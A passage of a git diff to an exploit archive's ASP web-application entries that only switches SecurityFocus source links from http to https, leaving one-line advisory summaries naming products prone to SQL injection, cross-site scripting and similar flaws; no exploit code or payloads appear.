@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26692/info +source: https://www.securityfocus.com/bid/26692/info Absolute News Manager .NET is prone to multiple remote vulnerabilities, including multiple cross-site scripting, SQL-injection, and information-disclosure issues. diff --git a/exploits/asp/webapps/30842.txt b/exploits/asp/webapps/30842.txt index d74186491..a5272394d 100644 --- a/exploits/asp/webapps/30842.txt +++ b/exploits/asp/webapps/30842.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26692/info +source: https://www.securityfocus.com/bid/26692/info Absolute News Manager .NET is prone to multiple remote vulnerabilities, including multiple cross-site scripting, SQL-injection, and information-disclosure issues. diff --git a/exploits/asp/webapps/30843.txt b/exploits/asp/webapps/30843.txt index 2f69cd935..bd257fed5 100644 --- a/exploits/asp/webapps/30843.txt +++ b/exploits/asp/webapps/30843.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26692/info +source: https://www.securityfocus.com/bid/26692/info Absolute News Manager .NET is prone to multiple remote vulnerabilities, including multiple cross-site scripting, SQL-injection, and information-disclosure issues. diff --git a/exploits/asp/webapps/30844.txt b/exploits/asp/webapps/30844.txt index 125fc25be..40c994035 100644 --- a/exploits/asp/webapps/30844.txt +++ b/exploits/asp/webapps/30844.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26692/info +source: https://www.securityfocus.com/bid/26692/info Absolute News Manager .NET is prone to multiple remote vulnerabilities, including multiple cross-site scripting, SQL-injection, and information-disclosure issues. diff --git a/exploits/asp/webapps/30845.txt b/exploits/asp/webapps/30845.txt index c2b0ac3a2..1ccde614f 100644 --- a/exploits/asp/webapps/30845.txt +++ b/exploits/asp/webapps/30845.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26692/info +source: https://www.securityfocus.com/bid/26692/info Absolute News Manager .NET is prone to multiple remote vulnerabilities, including multiple cross-site scripting, SQL-injection, and information-disclosure issues. diff --git a/exploits/asp/webapps/30855.txt b/exploits/asp/webapps/30855.txt index bf82dadde..c20f01dbc 100644 --- a/exploits/asp/webapps/30855.txt +++ b/exploits/asp/webapps/30855.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26761/info +source: https://www.securityfocus.com/bid/26761/info WebDoc is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/30860.txt b/exploits/asp/webapps/30860.txt index dba2c849b..96253f1ad 100644 --- a/exploits/asp/webapps/30860.txt +++ b/exploits/asp/webapps/30860.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26790/info +source: https://www.securityfocus.com/bid/26790/info bttlxe Forum is prone to multiple input-validation vulnerabilities, including SQL-injection issues and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/30938.txt b/exploits/asp/webapps/30938.txt index 6ae5319aa..1f7e84735 100644 --- a/exploits/asp/webapps/30938.txt +++ b/exploits/asp/webapps/30938.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27031/info +source: https://www.securityfocus.com/bid/27031/info Web Sihirbazi is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/30940.txt b/exploits/asp/webapps/30940.txt index 295b27367..1f1497b4b 100644 --- a/exploits/asp/webapps/30940.txt +++ b/exploits/asp/webapps/30940.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27044/info +source: https://www.securityfocus.com/bid/27044/info iPortalX is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/30941.txt b/exploits/asp/webapps/30941.txt index 7b31c9657..6b219da23 100644 --- a/exploits/asp/webapps/30941.txt +++ b/exploits/asp/webapps/30941.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27044/info +source: https://www.securityfocus.com/bid/27044/info iPortalX is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/30963.txt b/exploits/asp/webapps/30963.txt index c2201db38..41d07eb2f 100644 --- a/exploits/asp/webapps/30963.txt +++ b/exploits/asp/webapps/30963.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27080/info +source: https://www.securityfocus.com/bid/27080/info InstantSoftwares Dating Site is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/30993.txt b/exploits/asp/webapps/30993.txt index f977632cf..1394fc934 100644 --- a/exploits/asp/webapps/30993.txt +++ b/exploits/asp/webapps/30993.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27162/info +source: https://www.securityfocus.com/bid/27162/info Snitz Forums 2000 is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/31042.txt b/exploits/asp/webapps/31042.txt index 93718b39b..d605c2474 100644 --- a/exploits/asp/webapps/31042.txt +++ b/exploits/asp/webapps/31042.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27368/info +source: https://www.securityfocus.com/bid/27368/info MegaBBS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/31055.txt b/exploits/asp/webapps/31055.txt index 6083993cd..ab9311356 100644 --- a/exploits/asp/webapps/31055.txt +++ b/exploits/asp/webapps/31055.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27419/info +source: https://www.securityfocus.com/bid/27419/info Web Wiz Forums, NewsPad, and Rich Text Editor are prone to a remote information-disclosure vulnerability because they fail to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/31058.txt b/exploits/asp/webapps/31058.txt index 57140fe23..d5d0c6590 100644 --- a/exploits/asp/webapps/31058.txt +++ b/exploits/asp/webapps/31058.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27450/info +source: https://www.securityfocus.com/bid/27450/info Pre Hotel and Resorts is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/31059.txt b/exploits/asp/webapps/31059.txt index c45e79bc1..655b91f06 100644 --- a/exploits/asp/webapps/31059.txt +++ b/exploits/asp/webapps/31059.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27452/info +source: https://www.securityfocus.com/bid/27452/info E-SMART CART is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/31070.txt b/exploits/asp/webapps/31070.txt index 980947492..93b23c1dd 100644 --- a/exploits/asp/webapps/31070.txt +++ b/exploits/asp/webapps/31070.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27474/info +source: https://www.securityfocus.com/bid/27474/info ASPired2Protect is prone to an SQL-injection vulnerability because it fails to adequately sanitize user-supplied data. diff --git a/exploits/asp/webapps/31103.txt b/exploits/asp/webapps/31103.txt index 37d249e47..e562f9f93 100644 --- a/exploits/asp/webapps/31103.txt +++ b/exploits/asp/webapps/31103.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27610/info +source: https://www.securityfocus.com/bid/27610/info AstroSoft HelpDesk is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/31104.txt b/exploits/asp/webapps/31104.txt index 16dd69a1a..b5bf4c390 100644 --- a/exploits/asp/webapps/31104.txt +++ b/exploits/asp/webapps/31104.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27610/info +source: https://www.securityfocus.com/bid/27610/info AstroSoft HelpDesk is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/31117.txt b/exploits/asp/webapps/31117.txt index efb0f2b76..6575a9462 100644 --- a/exploits/asp/webapps/31117.txt +++ b/exploits/asp/webapps/31117.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27654/info +source: https://www.securityfocus.com/bid/27654/info WS_FTP Server Manager is prone to an authentication-bypass vulnerability and an information-disclosure vulnerability. diff --git a/exploits/asp/webapps/31191.txt b/exploits/asp/webapps/31191.txt index 28e2d86d3..f78ff8738 100644 --- a/exploits/asp/webapps/31191.txt +++ b/exploits/asp/webapps/31191.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27779/info +source: https://www.securityfocus.com/bid/27779/info Site2Nite Real Estate Web is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/31275.txt b/exploits/asp/webapps/31275.txt index 9d1a2aa86..2bac23202 100644 --- a/exploits/asp/webapps/31275.txt +++ b/exploits/asp/webapps/31275.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27924/info +source: https://www.securityfocus.com/bid/27924/info Aeries Student Information System is prone to multiple input-validation vulnerabilities, including multiple SQL-injection issues and an HTML-injection issue, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/31276.txt b/exploits/asp/webapps/31276.txt index bb0d5d557..81e624b4e 100644 --- a/exploits/asp/webapps/31276.txt +++ b/exploits/asp/webapps/31276.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27924/info +source: https://www.securityfocus.com/bid/27924/info Aeries Student Information System is prone to multiple input-validation vulnerabilities, including multiple SQL-injection issues and an HTML-injection issue, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/31286.txt b/exploits/asp/webapps/31286.txt index fbe0c2e8a..e83d112ee 100644 --- a/exploits/asp/webapps/31286.txt +++ b/exploits/asp/webapps/31286.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27948/info +source: https://www.securityfocus.com/bid/27948/info Citrix MetaFrame Web Manager is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/31314.txt b/exploits/asp/webapps/31314.txt index d62751d4a..08acccd0b 100644 --- a/exploits/asp/webapps/31314.txt +++ b/exploits/asp/webapps/31314.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28040/info +source: https://www.securityfocus.com/bid/28040/info Flicks Software AuthentiX is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/31404.txt b/exploits/asp/webapps/31404.txt index f65da08a5..fad400466 100644 --- a/exploits/asp/webapps/31404.txt +++ b/exploits/asp/webapps/31404.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28247/info +source: https://www.securityfocus.com/bid/28247/info Virtual Support Office XP (VSO-XP) is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/31413.txt b/exploits/asp/webapps/31413.txt index b9e4e7e34..d60bf7f38 100644 --- a/exploits/asp/webapps/31413.txt +++ b/exploits/asp/webapps/31413.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28279/info +source: https://www.securityfocus.com/bid/28279/info Imperva SecureSphere is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/31442.txt b/exploits/asp/webapps/31442.txt index da578ec0c..8cf7fae47 100644 --- a/exploits/asp/webapps/31442.txt +++ b/exploits/asp/webapps/31442.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28315/info +source: https://www.securityfocus.com/bid/28315/info PortalApp is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/31463.txt b/exploits/asp/webapps/31463.txt index baf2d4238..6b78dbbe7 100644 --- a/exploits/asp/webapps/31463.txt +++ b/exploits/asp/webapps/31463.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28376/info +source: https://www.securityfocus.com/bid/28376/info Iatek Knowledge Base is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/31546.txt b/exploits/asp/webapps/31546.txt index 4e2a1ef05..bf2ca4481 100644 --- a/exploits/asp/webapps/31546.txt +++ b/exploits/asp/webapps/31546.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28475/info +source: https://www.securityfocus.com/bid/28475/info DigiDomain is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/31547.txt b/exploits/asp/webapps/31547.txt index f76b26074..ee832ecc2 100644 --- a/exploits/asp/webapps/31547.txt +++ b/exploits/asp/webapps/31547.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28475/info +source: https://www.securityfocus.com/bid/28475/info DigiDomain is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/31582.txt b/exploits/asp/webapps/31582.txt index a9e266238..f3b2785bd 100644 --- a/exploits/asp/webapps/31582.txt +++ b/exploits/asp/webapps/31582.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28532/info +source: https://www.securityfocus.com/bid/28532/info EfesTECH Video is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/31644.txt b/exploits/asp/webapps/31644.txt index 114755f6c..5b040c248 100644 --- a/exploits/asp/webapps/31644.txt +++ b/exploits/asp/webapps/31644.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28772/info +source: https://www.securityfocus.com/bid/28772/info Cezanne Software is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/31645.txt b/exploits/asp/webapps/31645.txt index 463372c63..37407b6be 100644 --- a/exploits/asp/webapps/31645.txt +++ b/exploits/asp/webapps/31645.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28772/info +source: https://www.securityfocus.com/bid/28772/info Cezanne Software is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/31646.txt b/exploits/asp/webapps/31646.txt index f1fdeff63..729dc7c89 100644 --- a/exploits/asp/webapps/31646.txt +++ b/exploits/asp/webapps/31646.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28772/info +source: https://www.securityfocus.com/bid/28772/info Cezanne Software is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/31648.txt b/exploits/asp/webapps/31648.txt index 1a0900730..02bbdcc7c 100644 --- a/exploits/asp/webapps/31648.txt +++ b/exploits/asp/webapps/31648.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28773/info +source: https://www.securityfocus.com/bid/28773/info Cezanne Software is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/31649.txt b/exploits/asp/webapps/31649.txt index e4939f46f..e2010358e 100644 --- a/exploits/asp/webapps/31649.txt +++ b/exploits/asp/webapps/31649.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28773/info +source: https://www.securityfocus.com/bid/28773/info Cezanne Software is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/31650.txt b/exploits/asp/webapps/31650.txt index ce61fff4d..586e60f2c 100644 --- a/exploits/asp/webapps/31650.txt +++ b/exploits/asp/webapps/31650.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28774/info +source: https://www.securityfocus.com/bid/28774/info Cezanne Software is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/31666.txt b/exploits/asp/webapps/31666.txt index 614c7e35e..394fbf989 100644 --- a/exploits/asp/webapps/31666.txt +++ b/exploits/asp/webapps/31666.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28831/info +source: https://www.securityfocus.com/bid/28831/info CoBaLT is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/asp/webapps/31797.txt b/exploits/asp/webapps/31797.txt index d41ad1af6..41fea9a3a 100644 --- a/exploits/asp/webapps/31797.txt +++ b/exploits/asp/webapps/31797.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29229/info +source: https://www.securityfocus.com/bid/29229/info Philboard is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/31811.txt b/exploits/asp/webapps/31811.txt index dc0ffac5e..6b312e8b2 100644 --- a/exploits/asp/webapps/31811.txt +++ b/exploits/asp/webapps/31811.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29299/info +source: https://www.securityfocus.com/bid/29299/info Site Tanitimlari Scripti is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/31812.txt b/exploits/asp/webapps/31812.txt index 7c6aeadd8..3b5ff373c 100644 --- a/exploits/asp/webapps/31812.txt +++ b/exploits/asp/webapps/31812.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29300/info +source: https://www.securityfocus.com/bid/29300/info DizaynPlus Nobetci Eczane Takip is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/31843.txt b/exploits/asp/webapps/31843.txt index cadc39728..f14310b6c 100644 --- a/exploits/asp/webapps/31843.txt +++ b/exploits/asp/webapps/31843.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29370/info +source: https://www.securityfocus.com/bid/29370/info Excuse Online is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/31850.txt b/exploits/asp/webapps/31850.txt index 3fd2ef856..5ae2e87f6 100644 --- a/exploits/asp/webapps/31850.txt +++ b/exploits/asp/webapps/31850.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29375/info +source: https://www.securityfocus.com/bid/29375/info Campus Bulletin Board is prone to multiple input-validation vulnerabilities, including multiple SQL-injection issues and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/31851.txt b/exploits/asp/webapps/31851.txt index d1f588985..fa4bed658 100644 --- a/exploits/asp/webapps/31851.txt +++ b/exploits/asp/webapps/31851.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29375/info +source: https://www.securityfocus.com/bid/29375/info Campus Bulletin Board is prone to multiple input-validation vulnerabilities, including multiple SQL-injection issues and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/31852.txt b/exploits/asp/webapps/31852.txt index e64358221..459185fd1 100644 --- a/exploits/asp/webapps/31852.txt +++ b/exploits/asp/webapps/31852.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29375/info +source: https://www.securityfocus.com/bid/29375/info Campus Bulletin Board is prone to multiple input-validation vulnerabilities, including multiple SQL-injection issues and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/31854.html b/exploits/asp/webapps/31854.html index 8d0eac738..68a003a3f 100644 --- a/exploits/asp/webapps/31854.html +++ b/exploits/asp/webapps/31854.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29376/info +source: https://www.securityfocus.com/bid/29376/info The Campus Request Repairs System is prone to an unauthorized-access vulnerability because it fails to adequately limit access to administrative scripts used for creating accounts. diff --git a/exploits/asp/webapps/31859.txt b/exploits/asp/webapps/31859.txt index d1f79d553..1b684c9db 100644 --- a/exploits/asp/webapps/31859.txt +++ b/exploits/asp/webapps/31859.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29426/info +source: https://www.securityfocus.com/bid/29426/info JustPORTAL is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/31860.txt b/exploits/asp/webapps/31860.txt index 2e83baa68..8d8ea9cca 100644 --- a/exploits/asp/webapps/31860.txt +++ b/exploits/asp/webapps/31860.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29427/info +source: https://www.securityfocus.com/bid/29427/info Proje ASP Portal is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/31861.txt b/exploits/asp/webapps/31861.txt index b6133aa05..b0b5fb0f4 100644 --- a/exploits/asp/webapps/31861.txt +++ b/exploits/asp/webapps/31861.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29429/info +source: https://www.securityfocus.com/bid/29429/info The 'dvbbs' program is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/31865.txt b/exploits/asp/webapps/31865.txt index 3675da807..c54e137dd 100644 --- a/exploits/asp/webapps/31865.txt +++ b/exploits/asp/webapps/31865.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29437/info +source: https://www.securityfocus.com/bid/29437/info DotNetNuke is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/31869.txt b/exploits/asp/webapps/31869.txt index 53b82d77e..c137d02f1 100644 --- a/exploits/asp/webapps/31869.txt +++ b/exploits/asp/webapps/31869.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29471/info +source: https://www.securityfocus.com/bid/29471/info i-pos Storefront is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/31871.txt b/exploits/asp/webapps/31871.txt index 469054d1f..84e901d8f 100644 --- a/exploits/asp/webapps/31871.txt +++ b/exploits/asp/webapps/31871.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29478/info +source: https://www.securityfocus.com/bid/29478/info Te Ecard is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/31891.txt b/exploits/asp/webapps/31891.txt index e2989728e..a4844f35b 100644 --- a/exploits/asp/webapps/31891.txt +++ b/exploits/asp/webapps/31891.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29612/info +source: https://www.securityfocus.com/bid/29612/info Real Estate Website is prone to multiple input-validation vulnerabilities, including an SQL-injection issue and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/31967.txt b/exploits/asp/webapps/31967.txt index 539245e4a..a6e4dd291 100644 --- a/exploits/asp/webapps/31967.txt +++ b/exploits/asp/webapps/31967.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29957/info +source: https://www.securityfocus.com/bid/29957/info Commtouch Anti-Spam Enterprise Gateway is prone to a cross-site scripting vulnerability because the device fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/32111.txt b/exploits/asp/webapps/32111.txt index 9f7bb51e9..63a60f534 100644 --- a/exploits/asp/webapps/32111.txt +++ b/exploits/asp/webapps/32111.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30349/info +source: https://www.securityfocus.com/bid/30349/info Pre Survey Generator is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/32119.txt b/exploits/asp/webapps/32119.txt index f420b3fe2..f8f07d064 100644 --- a/exploits/asp/webapps/32119.txt +++ b/exploits/asp/webapps/32119.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30398/info +source: https://www.securityfocus.com/bid/30398/info Web Wiz Forums is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/32120.txt b/exploits/asp/webapps/32120.txt index 33e559a93..722541376 100644 --- a/exploits/asp/webapps/32120.txt +++ b/exploits/asp/webapps/32120.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30398/info +source: https://www.securityfocus.com/bid/30398/info Web Wiz Forums is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/32151.pl b/exploits/asp/webapps/32151.pl index 88df1661c..61ba4ff42 100755 --- a/exploits/asp/webapps/32151.pl +++ b/exploits/asp/webapps/32151.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30534/info +source: https://www.securityfocus.com/bid/30534/info Pcshey Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/32184.txt b/exploits/asp/webapps/32184.txt index 9ee1e14bc..81cdca303 100644 --- a/exploits/asp/webapps/32184.txt +++ b/exploits/asp/webapps/32184.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30567/info +source: https://www.securityfocus.com/bid/30567/info KAPhotoservice is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/32185.txt b/exploits/asp/webapps/32185.txt index a4e3b38a1..96b4cf64d 100644 --- a/exploits/asp/webapps/32185.txt +++ b/exploits/asp/webapps/32185.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30567/info +source: https://www.securityfocus.com/bid/30567/info KAPhotoservice is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/32255.txt b/exploits/asp/webapps/32255.txt index 6f751e1b3..4eba9ad93 100644 --- a/exploits/asp/webapps/32255.txt +++ b/exploits/asp/webapps/32255.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30712/info +source: https://www.securityfocus.com/bid/30712/info fipsCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/32278.txt b/exploits/asp/webapps/32278.txt index 370adad31..8b5bf1192 100644 --- a/exploits/asp/webapps/32278.txt +++ b/exploits/asp/webapps/32278.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30745/info +source: https://www.securityfocus.com/bid/30745/info K Web CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/32297.txt b/exploits/asp/webapps/32297.txt index 69d5c81c6..d8929d092 100644 --- a/exploits/asp/webapps/32297.txt +++ b/exploits/asp/webapps/32297.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30841/info +source: https://www.securityfocus.com/bid/30841/info Smart Survey is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/32300.txt b/exploits/asp/webapps/32300.txt index 842e8e11d..8794d9e5a 100644 --- a/exploits/asp/webapps/32300.txt +++ b/exploits/asp/webapps/32300.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30849/info +source: https://www.securityfocus.com/bid/30849/info ASP Search Engine is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/32394.txt b/exploits/asp/webapps/32394.txt index fa2f5f00c..c270b0acb 100644 --- a/exploits/asp/webapps/32394.txt +++ b/exploits/asp/webapps/32394.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31242/info +source: https://www.securityfocus.com/bid/31242/info Sama Educational Management System is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/asp/webapps/32401.txt b/exploits/asp/webapps/32401.txt index fabcb0f3e..e22d3ba55 100644 --- a/exploits/asp/webapps/32401.txt +++ b/exploits/asp/webapps/32401.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31298/info +source: https://www.securityfocus.com/bid/31298/info rgb72 WCMS is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/32412.txt b/exploits/asp/webapps/32412.txt index 59ff05b98..b93e9b925 100644 --- a/exploits/asp/webapps/32412.txt +++ b/exploits/asp/webapps/32412.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31338/info +source: https://www.securityfocus.com/bid/31338/info Omnicom Content Platform is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/asp/webapps/32485.txt b/exploits/asp/webapps/32485.txt index 96d504125..472590b34 100644 --- a/exploits/asp/webapps/32485.txt +++ b/exploits/asp/webapps/32485.txt 
